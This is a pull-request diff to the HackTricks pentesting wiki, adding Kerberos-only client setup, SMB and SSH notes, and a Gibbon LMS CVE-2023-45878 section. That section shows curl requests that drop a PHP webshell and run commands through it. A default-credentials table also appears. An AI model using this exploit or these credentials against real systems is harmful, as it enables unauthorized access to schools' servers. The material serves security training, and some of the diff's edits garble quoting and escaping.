Merge pull request #1348 from HackTricks-wiki/update_HTB__TheFrizz_20250827_141120

HTB TheFrizz

Author: carlospolop

src/network-services-pentesting/pentesting-kerberos-88/README.md

@@ -19,6 +19,53 @@ PORT   STATE SERVICE
 
 ### **To learn how to abuse Kerberos you should read the post about** [**Active Directory**](../../windows-hardening/active-directory-methodology/index.html)**.**
 
+## Kerberos-only environments: client prep and troubleshooting
+
+When NTLM is disabled on domain services (SMB/WinRM/etc.), you must authenticate with Kerberos. Common pitfalls and a working workflow:
+
+- Time synchronization is mandatory. If your host clock is skewed by more than a few minutes you will see `KRB_AP_ERR_SKEW` and all Kerberos auth will fail. Sync against the DC:
+
+```bash
+# quick one-shot sync (requires sudo)
+sudo ntpdate <dc.fqdn> || sudo chronyd -q 'server <dc.fqdn> iburst'
+```
+
+- Generate a valid krb5.conf for the target realm/domain. `netexec` (CME fork) can output one for you while testing SMB:
+
+```bash
+# Generate krb5.conf and install it
+netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf
+sudo cp krb5.conf /etc/krb5.conf
+```
+
+- Obtain a TGT and verify the ccache:
+
+```bash
+kinit <user>
+klist
+```
+
+- Use Kerberos with SMB tooling (no passwords sent, uses your ccache):
+
+```bash
+# netexec / CME
+netexec smb <dc.fqdn> -k            # lists shares, runs modules using Kerberos
+# impacket examples also support -k / --no-pass to use the ccache
+smbclient --kerberos //<dc.fqdn>/IPC$
+```
+
+- GSSAPI SSH single sign-on (OpenSSH to Windows OpenSSH server):
+
+```bash
+# Ensure krb5.conf is correct and you have a TGT (kinit)
+# Use the FQDN that matches the host SPN. Wrong names cause: "Server not found in Kerberos database"
+ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>
+```
+
+Tips:
+- Ensure your `/etc/hosts` resolves the exact FQDN you will SSH/SMB to, and that it comes before any bare domain entries if you are overriding DNS. SPN mismatches break GSSAPI.
+- If NTLM is disabled on SMB you may see `STATUS_NOT_SUPPORTED` with NTLM attempts; add `-k` to force Kerberos.
+
 ## More
 
 ### Shodan
@@ -36,6 +83,13 @@ https://adsecurity.org/?p=541
 
 Other exploits: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek)
 
+## References
+
+- [NetExec (CME) wiki – Kerberos and krb5.conf generation](https://www.netexec.wiki/)
+- [OpenSSH GSSAPIAuthentication](https://man.openbsd.org/ssh_config#GSSAPIAuthentication)
+- [MIT Kerberos – Using Kerberos on UNIX](https://web.mit.edu/kerberos/krb5-1.12/doc/user/user_config.html)
+- [0xdf – HTB: TheFrizz](https://0xdf.gitlab.io/2025/08/23/htb-thefrizz.html)
+
 ## HackTricks Automatic Commands
 
 ```

src/network-services-pentesting/pentesting-smb/README.md

@@ -269,8 +269,8 @@ done
 examples
 
 ```bash
-smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
-smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
+smbclient -U '%' -N \\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
+smbclient -U '%' -N \\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
 ```
 
 ### **Enumerate shares from Windows / without third-party tools**
@@ -402,6 +402,22 @@ smbclient --kerberos //ws01win10.domain.com/C$
 rpcclient -k ws01win10.domain.com
 ```
 
+In Kerberos-only environments (NTLM disabled), NTLM attempts against SMB may return `STATUS_NOT_SUPPORTED`. Fix common Kerberos issues and force Kerberos auth:
+
+```bash
+# sync clock to avoid KRB_AP_ERR_SKEW
+sudo ntpdate <dc.fqdn>
+
+# use Kerberos with tooling (reads your TGT from ccache)
+netexec smb <dc.fqdn> -k
+```
+
+For a complete client setup (krb5.conf generation, kinit, SSH GSSAPI/SPN caveats) see:
+
+{{#ref}}
+../pentesting-kerberos-88/README.md
+{{#endref}}
+
 ## **Execute Commands**
 
 ### **crackmapexec**
@@ -560,8 +576,8 @@ Entry_1:
 
     With Creds
     smbmap -H {IP} -u {Username} -p {Password}
-    smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
-    smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
+    smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP}
+    smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
     crackmapexec smb {IP} -u {Username} -p {Password} --shares
     GetADUsers.py {Domain_Name}/{Username}:{Password} -all
     GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
@@ -597,5 +613,10 @@ Entry_6:
 
 ```
 
-{{#include ../../banners/hacktricks-training.md}}
+## References
+
+- [NetExec (CME) wiki – Kerberos usage](https://www.netexec.wiki/)
+- [Pentesting Kerberos (88) – client setup and troubleshooting](../pentesting-kerberos-88/README.md)
+- [0xdf – HTB: TheFrizz](https://0xdf.gitlab.io/2025/08/23/htb-thefrizz.html)
 
+{{#include ../../banners/hacktricks-training.md}}

src/network-services-pentesting/pentesting-ssh.md

@@ -144,18 +144,39 @@ Some systems have known flaws in the random seed used to generate cryptographic
 
 You should look here in order to search for valid keys for the victim machine.
 
-### Kerberos
+### Kerberos / GSSAPI SSO
 
-**crackmapexec** using the `ssh` protocol can use the option `--kerberos` to **authenticate via kerberos**.\
-For more info run `crackmapexec ssh --help`.
+If the target SSH server supports GSSAPI (for example Windows OpenSSH on a domain controller), you can authenticate using your Kerberos TGT instead of a password.
+
+Workflow from a Linux attacker host:
+
+```bash
+# 1) Ensure time is in sync with the KDC to avoid KRB_AP_ERR_SKEW
+sudo ntpdate <dc.fqdn>
+
+# 2) Generate a krb5.conf for the target realm (optional, but handy)
+netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf
+sudo cp krb5.conf /etc/krb5.conf
+
+# 3) Obtain a TGT for the user
+kinit <user>
+klist
+
+# 4) SSH with GSSAPI, using the FQDN that matches the host SPN
+ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>
+```
+
+Notes:
+- If you connect to the wrong name (e.g., short host, alias, or wrong order in `/etc/hosts`), you may get: "Server not found in Kerberos database" because the SPN does not match.
+- `crackmapexec ssh --kerberos` can also use your ccache for Kerberos auth.
 
 ## Default Credentials
 
 | **Vendor** | **Usernames**                                                                                               | **Passwords**                                                                                                                                                                                             |
 | ---------- | ----------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
 | APC        | apc, device                                                                                                 | apc                                                                                                                                                                                                       |
 | Brocade    | admin                                                                                                       | admin123, password, brocade, fibranne                                                                                                                                                                     |
-| Cisco      | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin                                           | admin, Admin123, default, password, secur4u, cisco, Cisco, \_Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
+| Cisco      | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin                                           | admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
 | Citrix     | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin                                                            | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler                                                                                                                      |
 | D-Link     | admin, user                                                                                                 | private, admin, user                                                                                                                                                                                      |
 | Dell       | root, user1, admin, vkernel, cli                                                                            | calvin, 123456, password, vkernel, Stor@ge!, admin                                                                                                                                                        |
@@ -296,7 +317,7 @@ debug1: Next authentication method: password
 
 Review the SSH server configuration is necessary to check that only expected\
 methods are authorized. Using the verbose mode on the client can help to see\
-the effectiveness of the configuration.
+ the effectiveness of the configuration.
 
 ### Config files
 
@@ -377,6 +398,8 @@ The common lesson is that any deviation from the RFC-mandated state transitions
 - [Unit 42 – Erlang/OTP SSH CVE-2025-32433](https://unit42.paloaltonetworks.com/erlang-otp-cve-2025-32433/)
 - [SSH hardening guides](https://www.ssh-audit.com/hardening_guides.html)
 - [Turgensec SSH hacking guide](https://community.turgensec.com/ssh-hacking-guide)
+- [Pentesting Kerberos (88) – client setup and troubleshooting](pentesting-kerberos-88/README.md)
+- [0xdf – HTB: TheFrizz](https://0xdf.gitlab.io/2025/08/23/htb-thefrizz.html)
 
 ## HackTricks Automatic Commands
 

src/pentesting-web/file-upload/README.md

@@ -115,8 +115,9 @@ Mitigations:
 - **Possible Information disclosure**:
   1. Upload **several times** (and at the **same time**) the **same file** with the **same name**
   2. Upload a file with the **name** of a **file** or **folder** that **already exists**
-  3. Uploading a file with **".”, "..”, or "…” as its name**. For instance, in Apache in **Windows**, if the application saves the uploaded files in "/www/uploads/” directory, the ".” filename will create a file called "uploads” in the "/www/” directory.
-  4. Upload a file that may not be deleted easily such as **"…:.jpg”** in **NTFS**. (Windows)
+  3. Uploading a file with **"." , "..", or "…" as its name**. For instance, in Apache in **Windows**, if the application saves the uploaded files in "/www/uploads/" directory, the "." filename will create a file called 
+  uploads” in the "/www/" directory.
+  4. Upload a file that may not be deleted easily such as **"…:.jpg"** in **NTFS**. (Windows)
   5. Upload a file in **Windows** with **invalid characters** such as `|<>*?”` in its name. (Windows)
   6. Upload a file in **Windows** using **reserved** (**forbidden**) **names** such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
 - Try also to **upload an executable** (.exe) or an **.html** (less suspicious) that **will execute code** when accidentally opened by victim.
@@ -132,7 +133,7 @@ The `.inc` extension is sometimes used for php files that are only used to **imp
 
 ## **Jetty RCE**
 
-If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
+If you can upload a XML file into a Jetty server you can obtain [RCE because **new *.xml and *.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
 
 ![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../images/image (1047).png>)
 
@@ -166,10 +167,54 @@ The execution of the payload occurs during the parsing of the configuration file
 
 It's crucial to understand the lax nature of uWSGI's configuration file parsing. Specifically, the discussed payload can be inserted into a binary file (such as an image or PDF), further broadening the scope of potential exploitation.
 
+### Gibbon LMS arbitrary file write to pre-auth RCE (CVE-2023-45878)
+
+Unauthenticated endpoint in Gibbon LMS allows arbitrary file write inside the web root, leading to pre-auth RCE by dropping a PHP file. Vulnerable versions: up to and including 25.0.01.
+
+- Endpoint: `/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php`
+- Method: POST
+- Required params:
+  - `img`: data-URI-like string: `[mime];[name],[base64]` (server ignores type/name, base64-decodes the tail)
+  - `path`: destination filename relative to Gibbon install dir (e.g., `poc.php` or `0xdf.php`)
+  - `gibbonPersonID`: any non-empty value is accepted (e.g., `0000000001`)
+
+Minimal PoC to write and read back a file:
+
+```bash
+# Prepare test payload
+printf '0xdf was here!' | base64
+# => MHhkZiB3YXMgaGVyZSEK
+
+# Write poc.php via unauth POST
+curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
+  -d 'img=image/png;test,MHhkZiB3YXMgaGVyZSEK&path=poc.php&gibbonPersonID=0000000001'
+
+# Verify write
+curl http://target/Gibbon-LMS/poc.php
+```
+
+Drop a minimal webshell and execute commands:
+
+```bash
+# '<?php system($_GET["cmd"]); ?>' base64
+# PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==
+
+curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
+  -d 'img=image/png;foo,PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==&path=shell.php&gibbonPersonID=0000000001'
+
+curl 'http://target/Gibbon-LMS/shell.php?cmd=whoami'
+```
+
+Notes:
+- The handler performs `base64_decode($_POST["img"])` after splitting by `;` and `,`, then writes bytes to `$absolutePath . '/' . $_POST['path']` without validating extension/type.
+- Resulting code runs as the web service user (e.g., XAMPP Apache on Windows).
+
+References for this bug include the usd HeroLab advisory and the NVD entry. See the References section below.
+
 ## **wget File Upload/SSRF Trick**
 
 In some occasions you may find that a server is using **`wget`** to **download files** and you can **indicate** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **this check can be bypassed.**\
-The **maximum** length of a **filename** in **linux** is **255**, however, **wget** truncate the filenames to **236** characters. You can **download a file called "A"\*232+".php"+".gif"**, this filename will **bypass** the **check** (as in this example **".gif"** is a **valid** extension) but `wget` will **rename** the file to **"A"\*232+".php"**.
+The **maximum** length of a **filename** in **linux** is **255**, however, **wget** truncate the filenames to **236** characters. You can **download a file called "A"*232+".php"+".gif"**, this filename will **bypass** the **check** (as in this example **".gif"** is a **valid** extension) but `wget` will **rename** the file to **"A"*232+".php"**.
 
 ```bash
 #Create file and HTTP server
@@ -285,6 +330,7 @@ Below is an example of Python code used to create a malicious zip file:
 import zipfile
 from io import BytesIO
 
+
 def create_zip():
     f = BytesIO()
     z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
@@ -323,7 +369,7 @@ For further details **check the original post in**: [https://blog.silentsignal.e
 
     ```bash
     :set modifiable
-    :%s/xxA/..\//g
+    :%s/xxA/../g
     :x!
     ```
 
@@ -373,6 +419,9 @@ How to avoid file type detections by uploading a valid JSON file even if not all
 - [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
 - [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
 - [https://blog.doyensec.com/2025/01/09/cspt-file-upload.html](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)
+- [usd HeroLab – Gibbon LMS arbitrary file write (CVE-2023-45878)](https://herolab.usd.de/security-advisories/usd-2023-0025/)
+- [NVD – CVE-2023-45878](https://nvd.nist.gov/vuln/detail/CVE-2023-45878)
+- [0xdf – HTB: TheFrizz](https://0xdf.gitlab.io/2025/08/23/htb-thefrizz.html)
 - [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
 - [CVE-2024-21546 – NVD entry](https://nvd.nist.gov/vuln/detail/CVE-2024-21546)
 - [PoC gist for LFM .php. bypass](https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca)